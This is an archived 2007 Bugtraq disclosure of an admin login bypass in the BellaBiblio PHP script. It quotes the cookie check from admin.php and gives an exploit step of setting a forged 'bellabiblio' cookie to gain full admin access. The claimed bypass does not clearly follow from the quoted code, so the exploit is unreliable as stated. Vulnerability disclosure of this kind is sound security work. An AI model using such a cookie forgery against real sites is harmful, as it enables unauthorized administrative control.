lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070730192958.5047.qmail@securityfocus.com> Date: 30 Jul 2007 19:29:58 -0000 From: ilkerkandemir@...et.com To: bugtraq@...urityfocus.com Subject: BellaBiblio Admin Login Bypass BellaBiblio Admin Login Bypass SCRIPT: BellaBiblio DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com> Bug in;(admin.php) if (isset($_COOKIE['bellabiblio'])) { if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) { if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = ""; EXPLOIT: Set your cookie: bellabiblio=administrator http:/site.com/admin.php And you have full admin access